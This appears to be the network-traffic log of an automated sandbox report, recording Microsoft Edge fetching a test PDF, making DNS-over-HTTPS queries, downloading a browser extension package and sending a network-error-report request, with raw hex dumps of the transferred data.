                                                                                                                                                                                                                                                            Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: public, max-age=3000
                                                                                                                                                                                                                                                            Vary: Accept-Encoding


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            0192.168.2.649690185.172.148.1324437096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-03-07 20:40:13 UTC714OUTGET /392171258/files/doc_downloads/test.pdf HTTP/1.1
                                                                                                                                                                                                                                                            Host: s28.q4cdn.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                            Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                            2025-03-07 20:40:13 UTC518INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: keycdn
                                                                                                                                                                                                                                                            Date: Fri, 07 Mar 2025 20:40:13 GMT
                                                                                                                                                                                                                                                            Content-Type: application/pdf
                                                                                                                                                                                                                                                            Content-Length: 3908
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            x-amz-id-2: MEJ/DaQ20IhNvbBtAOMQkVh3Rv/v58E1kDjZSPbBoSzQOXwZpc8fJwSYN/NLYrljEc8hjH6f7nc=
                                                                                                                                                                                                                                                            x-amz-request-id: CYAZDEMEG8JSRWVB
                                                                                                                                                                                                                                                            Last-Modified: Mon, 21 Jun 2021 14:40:45 GMT
                                                                                                                                                                                                                                                            ETag: "331e8397807e65be4f838ccd95787880"
                                                                                                                                                                                                                                                            Expires: Fri, 07 Mar 2025 21:40:13 GMT
                                                                                                                                                                                                                                                            Cache-Control: max-age=3600
                                                                                                                                                                                                                                                            X-Cache: HIT
                                                                                                                                                                                                                                                            X-Edge-Location: defr
                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            2025-03-07 20:40:13 UTC3908INData Raw: 25 50 44 46 2d 31 2e 32 0d 25 e2 e3 cf d3 0d 0a 33 20 30 20 6f 62 6a 0d 3c 3c 20 0d 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 20 0d 2f 4f 20 35 20 0d 2f 48 20 5b 20 37 36 30 20 31 35 37 20 5d 20 0d 2f 4c 20 33 39 30 38 20 0d 2f 45 20 33 36 35 38 20 0d 2f 4e 20 31 20 0d 2f 54 20 33 37 33 31 20 0d 3e 3e 20 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 72 65 66 0d 33 20 31 35 20 0d 30 30 30 30 30 30 30 30 31 36 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 30 36 34 34 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 30 39 31 37 20 30 30 30 30 30 20 6e 0d 0a 30 30 30 30 30 30 31 30 36 38 20
                                                                                                                                                                                                                                                            Data Ascii: %PDF-1.2%3 0 obj<< /Linearized 1 /O 5 /H [ 760 157 ] /L 3908 /E 3658 /N 1 /T 3731 >> endobj xref3 15 0000000016 00000 n0000000644 00000 n0000000917 00000 n0000001068


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1192.168.2.649700162.159.61.34437096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-03-07 20:40:14 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                            2025-03-07 20:40:14 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                            2025-03-07 20:40:15 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Fri, 07 Mar 2025 20:40:14 GMT
                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                            CF-RAY: 91cce82539b327d2-SAN
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2025-03-07 20:40:15 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 d0 00 04 8e fb 28 23 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom(#)


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2192.168.2.649703142.250.185.1614437096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-03-07 20:40:14 UTC594OUTGET /crx/blobs/Ad_brx23lef_cW590ESOTTAroOhZ9si0XFJIUC52j2ILHW1VLB5ou6c0RgLWwGr1aRJJZ0WPNyiPBYgIpWfykvhKW-6BLzMRsp9ykw5f6ReBQmPpO6WB9pcSJPfykLTHDjYAxlKa5bf72z8tHS5eXuTavTP1h4WZBjSs/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_89_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                            Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                            2025-03-07 20:40:15 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            X-GUploader-UploadID: AKDAyIspOzUsnctWw9YHGjqJgHaNVa_jzzOCGlMQh1vNO8E8ZnmYwUpqjybuTugoAeEqIrVq
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Content-Length: 154545
                                                                                                                                                                                                                                                            X-Goog-Hash: crc32c=048SZw==
                                                                                                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                                                                                                            Date: Fri, 07 Mar 2025 06:32:18 GMT
                                                                                                                                                                                                                                                            Expires: Sat, 07 Mar 2026 06:32:18 GMT
                                                                                                                                                                                                                                                            Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                            Age: 50877
                                                                                                                                                                                                                                                            Last-Modified: Tue, 18 Feb 2025 14:41:46 GMT
                                                                                                                                                                                                                                                            ETag: 1ce33fd4_e3dec04f_5b9bae7c_2a4476c8_8092e87a
                                                                                                                                                                                                                                                            Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2025-03-07 20:40:15 UTC815INData Raw: 43 72 32 34 03 00 00 00 e7 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                            Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                            2025-03-07 20:40:15 UTC1378INData Raw: 5a 8e ff f9 eb 37 51 dd ca eb 79 18 cf 97 fe db 3f be 8d d7 aa aa f3 5b fd b7 a1 ba fe ed 74 96 d5 b7 bf 7f bb 9d df fb 4a fc 52 5e fa b1 ea c7 6f ff f8 f5 db 90 3f e5 25 17 ea fd d5 33 68 0a c3 d2 38 b3 b4 d4 a8 eb d2 a8 65 f9 dc bf 30 f3 76 ce ba e9 33 33 c6 53 69 c8 17 9e ec 5f e0 ee a7 05 cf 8f 33 f7 64 cf 53 a8 ed 9b cb 59 bd bf 0e 1b 62 ec bf fe de c9 1b 4f c3 73 24 c7 1f fb de a9 85 f7 7e 8e ce fb 29 6c de ef a5 67 f5 5f ef 29 3b fb 53 00 fb 92 a5 f0 f2 f5 79 6e 40 c6 9f da c4 d8 fb 33 69 47 04 29 18 49 37 36 dc 83 5d de 11 5d cc 74 5f ea 01 84 3a df e2 2e 78 e6 7e b0 a9 3c 6e f1 67 60 1f fc db b9 f4 80 96 6f f7 2f 7b 69 df 0a 03 d6 85 47 e7 83 01 ba 83 a1 cb d2 84 35 37 d4 eb 6e 98 0b 63 73 3e 6c 83 67 61 d8 7f 8c f3 eb d9 82 29 77 65 4f cd 7a 97
                                                                                                                                                                                                                                                            Data Ascii: Z7Qy?[tJR^o?%3h8e0v33Si_3dSYbOs$~)lg_);Syn@3iG)I76]]t_:.x~<ng`o/{iG57ncs>lga)weOz
                                                                                                                                                                                                                                                            2025-03-07 20:40:15 UTC1378INData Raw: e1 18 91 21 e1 fe 90 57 ac 76 f3 9d 03 a9 36 b9 09 8d 37 b4 09 78 d6 b5 4f 08 4a 4b d5 2c 5c 64 af bc ff ca fb a3 6c a6 13 4f 55 bf 97 c8 80 9a 66 12 0a 72 e1 42 af d8 81 38 f7 21 0a a5 6b 8a ae de 22 17 28 0d 08 50 f9 d4 7d a4 89 cf c5 fb f7 fb b5 9e 7b 83 e7 60 0c 7b 29 b9 36 39 07 02 1f 21 19 3b 22 c5 b6 d8 09 37 d9 89 a0 24 3c 46 3a 72 ca 5e 69 34 51 7a 44 c9 14 fa cb 73 5f fe 3f 34 b8 6c d0 90 69 b5 14 3e bf e6 86 4c 13 37 1c b1 ef b8 71 c3 7b 6e 04 19 ea 54 29 98 ce 99 bb 3c 23 1d 3f 96 12 38 c8 10 9b e5 b5 27 d6 f2 1f 95 cf dd 20 8f bb 70 ae 5b e1 06 06 d6 41 07 7d ce 73 6d 38 e0 59 69 80 87 58 e8 ff 34 62 e3 f1 a0 3e 8a 33 82 76 55 f7 fe 58 e4 6f ae 5d 7b 83 0b 25 68 53 73 78 13 d2 9d 23 50 b7 58 87 04 99 75 a0 32 46 c2 5b 7d 56 59 87 a8 7e e0 c5
                                                                                                                                                                                                                                                            Data Ascii: !Wv67xOJK,\dlOUfrB8!k"(P}{`{)69!;"7$<F:r^i4QzDs_?4li>L7q{nT)<#?8' p[A}sm8YiX4b>3vUXo]{%hSsx#PXu2F[}VY~
                                                                                                                                                                                                                                                            2025-03-07 20:40:15 UTC1378INData Raw: df 3f 43 59 9f 10 b1 87 9c be 4e 44 e5 51 d6 2d e6 ab 7b b1 72 6f 45 65 c5 17 e5 d9 73 82 c5 01 33 95 a3 3a 6a 21 33 d8 56 dd 74 8c 12 ed 59 fa e2 9a 6b 28 a5 18 ec 12 30 80 7c e6 2d ef 54 ee 58 62 6f 3a f5 5a 9f 13 91 8d 45 58 d0 71 b6 d7 b1 4e 3f 60 3b b8 9c 59 35 6b 00 c4 64 8c 91 67 dd 71 57 4b e6 02 23 a1 d0 aa 3a f0 81 54 6d 2e b1 2f bd 95 ec e5 40 f2 06 f0 b2 71 ce 25 b3 0f 98 20 23 36 d1 86 77 fc 2d c3 ce 27 56 ae 1f b5 76 0d 99 fd a4 5a a6 e3 f6 55 4f cc 52 cf 77 3f 97 d8 3f 14 df 2d 59 a9 3b a5 ef 4e 1c bc 9b bc 1d 14 f3 a0 a7 3b 34 26 1d 8c b0 ab 74 88 b4 8f af fd 46 ec 0d b7 cc e4 5f eb af cd fa e0 19 7a fb e7 ff c1 5f 4b 75 87 ac ad 7f aa db 7b 91 3a 1a 73 c7 b7 58 b3 fd 42 42 16 cf b4 4d 40 3c 13 d0 5a 8c 8d 2f e1 ce c9 12 2c f4 92 c0 0b 92
                                                                                                                                                                                                                                                            Data Ascii: ?CYNDQ-{roEes3:j!3VtYk(0|-TXbo:ZEXqN?`;Y5kdgqWK#:Tm./@q% #6w-'VvZUORw??-Y;N;4&tF_z_Ku{:sXBBM@<Z/,
                                                                                                                                                                                                                                                            2025-03-07 20:40:15 UTC1378INData Raw: bf e2 7c 0c 41 ed 15 1a 3c 60 0f 76 71 2f a2 dc 05 2c 66 ae c6 d4 f8 0e 4c 7b c6 5d f0 a1 32 9e 5e ba d6 91 28 bf 5f b6 d9 23 66 b7 3f e5 4a f5 1c 3d a7 b6 2c 98 1a 3b b0 bf 18 0c a5 1f ff b7 fb 82 03 e1 29 76 ad 6d 6a 0a 3f 4c 9d 30 c2 ea 7f 6e bd ff 3a c3 04 77 ef 96 aa a7 2b 56 3e 17 35 c0 55 1a 98 54 ae 5d 27 ad f5 27 7d 2f 0d fa 14 9d 6c d4 bd cd c2 0c ae aa ce 4e 59 27 ef a9 e9 a8 7b fe d7 fb cf 54 3a a7 90 0d a6 12 73 a0 bc 15 83 b4 ce a9 87 5a 35 af 46 d8 e9 b0 da f1 5a 74 82 97 3b e7 a5 20 e3 47 d1 50 af 6c 84 ca 74 ba 50 d7 eb d4 bd c6 2c 8d bf ae a5 7d 31 ff a3 96 6e fb ee df e7 2d 4f 7f 79 ce f2 f7 cf 0e c2 a3 63 6a c8 f6 f7 b3 92 b5 aa 51 eb 9e ab ba e0 6c 7c 14 cc 96 99 61 dd 8b 4e de 8a ce 52 fe 73 fa 2c bc fa 9a 7b ed f9 7f 3f 6b aa 7a ee
                                                                                                                                                                                                                                                            Data Ascii: |A<`vq/,fL{]2^(_#f?J=,;)vmj?L0n:w+V>5UT]''}/lNY'{T:sZ5FZt; GPltP,}1n-OycjQl|aNRs,{?kz
                                                                                                                                                                                                                                                            2025-03-07 20:40:15 UTC1378INData Raw: 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 2d 00 73 65 72 76 69 63 65 5f 77 6f 72 6b 65 72 5f 62 69 6e 5f 70 72 6f 64 2e 6a 73 55 54 05 00 01 72 77 a2 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 05 27 c4 42 77 db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 cc bd 7b 5f db c8 92 00 fa 7f 3e 85 f1 2f cb 48 b1 70 6c 20 99 c4 46 f1 12 42 12 12 42 08 90 d7 30 9c dc 96 d4 7a 80 6c 39 7e 10 20 f6 7e f6 5b 55 dd 2d 75 cb 32 30 e7 ec de df 9d dd 13 64 a9 9f d5 f5 ee ea ea 3f a6 63 5e 1b 4f 46 89 3f f9 a3 1b 4e 07 fe 24 c9 06 35 c6 2c fb f7 88 4f a6 a3 41 4d bd b4 58 fe 8a cd e7 79 d1 8b 8a 92 f6 6f ad 80 5e 51 2b 21 df 4c e2 64 7c ca ce b4 f2 1e bb b5 02 f4 7d c9 46 b5 9f c5 60 7d aa 80 2f 3d b7 d5 5d 5a d1 db 62 cd 94 0f a2 49 dc fb
                                                                                                                                                                                                                                                            Data Ascii: !-service_worker_bin_prod.jsUTrwg 'Bw{_>/Hpl FBB0zl9~ ~[U-u20d?c^OF?N$5,OAMXyo^Q+!Ld|}F`}/=]ZbI
                                                                                                                                                                                                                                                            2025-03-07 20:40:15 UTC1378INData Raw: 21 b9 18 02 19 54 68 64 a6 f8 51 a3 98 cd 42 26 c5 15 e0 5d 3f 19 f3 a5 1a 40 21 87 5b 5d 7a 48 dd cb 2c 09 6a f2 d7 39 c2 9d 9e b6 81 23 90 08 8d 5d fa 9d 59 36 31 95 c8 02 e1 c9 c7 59 7a c9 1d 7c 42 c8 d8 92 95 a4 f6 6f f5 0a 9e e7 ba 06 90 77 4b 94 9f 7f 08 70 40 72 1a 91 a1 93 f4 a2 0e 71 4d 2b 9f 48 0c ad 43 f1 5b 75 80 f3 82 e3 47 b9 ae 03 bd 52 b7 f9 18 60 8e c5 cc 24 18 2c 4d 54 c4 cd 4b 0b fb 11 c5 05 c6 41 c7 5d a1 e4 85 0c f9 f1 49 d2 e7 d9 74 62 f4 9e 1a bd 73 2b 72 5a 50 4b 2f 71 a9 4b 24 c4 16 d1 7b 04 a2 55 f4 25 b1 42 f0 80 48 80 3e ea 16 e3 56 18 16 c3 fa c5 5b 51 a1 32 c7 a2 4a ea 3e 88 4e e3 b3 2e fe 43 93 a6 45 4b 2d b5 44 7d 09 84 0c 9e c0 7c d1 17 c5 18 68 66 4c 65 11 44 82 2d 44 5d 80 52 d7 ab ae a7 e1 5d 84 fd 96 0d ae a1 fd 3b 9d
                                                                                                                                                                                                                                                            Data Ascii: !ThdQB&]?@![]zH,j9#]Y61Yz|BowKp@rqM+HC[uGR`$,MTKA]Itbs+rZPK/qK${U%BH>V[Q2J>N.CEK-D}|hfLeD-D]R];
                                                                                                                                                                                                                                                            2025-03-07 20:40:15 UTC1378INData Raw: 5e f0 2c 0c 45 53 fc ae 80 ad bc 92 3b d5 58 5a 68 46 28 42 84 94 d3 3e 5b bf e7 b6 d3 5f 78 f3 60 48 13 66 d6 e9 69 ea ac 9f 39 a7 7d 67 e3 ec 8c 56 72 88 7e 22 98 ea 8a bb 3e 9b 89 1f 7d f8 b1 51 74 04 2c 8b a7 7c 82 90 84 67 5a 42 67 53 0d 1c 18 1a 90 22 7c 5a 5d 55 95 5d 77 53 8a b4 2b 45 24 a0 fb cf 01 29 72 0b 58 20 74 fd a1 74 75 c7 49 10 f0 c1 8f 7a c3 c0 ba 6e 68 d5 85 07 a3 4e cf c3 11 47 c5 47 02 11 f4 4e f1 1a 27 29 9d e7 68 63 ea 52 0b c6 5a ac 51 0a f2 91 20 8a d8 65 2a e0 7b 03 40 00 20 1a 49 22 b5 0b 7e 0d 2d d2 84 75 d4 31 ea 68 65 6b 21 4b 52 94 54 50 3e 05 bd e7 54 d0 d1 99 db ef 6a f2 d5 14 a8 91 31 b4 9c 99 04 04 49 d9 61 4f 6f ac 23 c9 ba 64 2e 8e ef 68 e5 41 24 9f a0 29 47 5a 0a 66 1b 62 71 ef 1c cc 42 2b 3d 51 b1 66 0c 12 16 ba bc
                                                                                                                                                                                                                                                            Data Ascii: ^,ES;XZhF(B>[_x`Hfi9}gVr~">}Qt,|gZBgS"|Z]U]wS+E$)rX ttuIznhNGGN')hcRZQ e*{@ I"~-u1hek!KRTP>Tj1IaOo#d.hA$)GZfbqB+=Qf
                                                                                                                                                                                                                                                            2025-03-07 20:40:15 UTC1378INData Raw: cd 0b 2e 20 65 07 8d e1 df 9f a6 dc 9f 91 d1 02 95 41 91 27 31 af fd 81 85 fe a8 11 6e 60 80 51 6d 69 bf b5 fe 74 3c a1 38 19 8f d7 b0 51 8c 91 d1 76 d0 c8 ff a8 03 f4 88 47 bb 57 c3 ea ae 5f 27 23 68 4c 05 89 e0 8e f4 fd fa 65 b5 11 8f a6 29 2e ca 15 28 63 e3 31 89 21 89 83 34 e1 46 bd 6e 0b ed f3 63 88 90 80 e5 02 99 e1 ae b5 4d f4 09 47 59 ff 5e 90 44 72 84 55 17 bb 5c 3d bf 83 51 e2 12 2b 80 3e c2 7f 16 d9 e4 55 46 36 c9 26 cc 80 b9 df 1e 48 0f 22 6c af d0 06 50 c7 58 01 4c f2 4a fa 00 17 04 59 70 02 a9 e2 44 80 86 32 5e 0b 9b c0 8a d2 89 2c 76 e9 c2 2e 96 28 d7 f6 d0 95 13 15 5b 45 dc 24 6d c9 54 ff 17 19 c9 29 f6 19 9c 95 98 09 2e 96 08 3d 02 6a 79 8d 7b 9c cb 1d f6 7a 9f e6 4e 1b 72 10 15 13 46 66 64 32 3e 60 07 50 8e 82 93 dd bd 41 88 2d 5f 8b 5f
                                                                                                                                                                                                                                                            Data Ascii: . eA'1n`Qmit<8QvGW_'#hLe).(c1!4FncMGY^DrU\=Q+>UF6&H"lPXLJYpD2^,v.([E$mT).=jy{zNrFfd2>`PA-__
                                                                                                                                                                                                                                                            2025-03-07 20:40:15 UTC1378INData Raw: 5d 49 9d cd 31 16 eb fa 20 64 84 0b 12 7f ba be 3d 67 ea 4d 9f 8f c7 2c e2 6e 7e 34 88 4e b1 ca a0 29 55 c8 67 d3 31 80 3f 8f a9 06 01 76 6d ed 31 87 7a b1 bb 7b 3a a8 07 ac cf 5d 15 ad 8b df eb c5 24 df 09 fe a7 1d bf 58 3c 92 c0 ba 73 3a 75 81 f3 78 cf dc 05 45 00 7e f7 7b 55 ba 08 7d b1 ec 79 67 f1 e3 e3 7f 9d fe 3d fe fb 8a b5 ce 1e 59 f8 74 7c f6 a8 67 e7 af 1e 3e 16 e2 9b d9 a7 ed 33 d1 f1 3e 73 3e 30 17 24 58 7d 67 ff e3 f1 e7 a3 dd 1f af f7 b7 df 1c 83 c6 70 c0 40 d9 43 03 f0 f4 69 bb b5 d9 6a 6f b4 da 67 dd 7d e6 1e 48 96 dd 3b 60 1d f4 a5 ab 29 7f 64 92 ae 98 7b 09 b0 b9 4c 22 14 db 39 fd a0 ed 07 12 12 c0 3b da 8e 00 6f 6c d0 a8 ea 82 d1 1f 32 e7 93 59 e9 90 b9 9f 58 ef 93 56 fc 15 9b 80 08 c6 7e e9 44 5e d1 ed 91 4e 63 fb ac 77 88 ff df f4 50
                                                                                                                                                                                                                                                            Data Ascii: ]I1 d=gM,n~4N)Ug1?vm1z{:]$X<s:uxE~{U}yg=Yt|g>3>s>0$X}gp@Cijog}H;`)d{L"9;ol2YXV~D^NcwP


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            3192.168.2.649701172.64.41.34437096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-03-07 20:40:14 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                            2025-03-07 20:40:14 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                            2025-03-07 20:40:15 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Fri, 07 Mar 2025 20:40:15 GMT
                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                            CF-RAY: 91cce826184b27d1-SAN
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2025-03-07 20:40:15 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 29 00 04 8e fa 48 83 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)H)


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            4192.168.2.6497042.22.242.114437096C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-03-07 20:40:14 UTC442OUTOPTIONS /api/report?cat=bingbusiness HTTP/1.1
                                                                                                                                                                                                                                                            Host: bzib.nelreports.net
                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                            Origin: https://business.bing.com
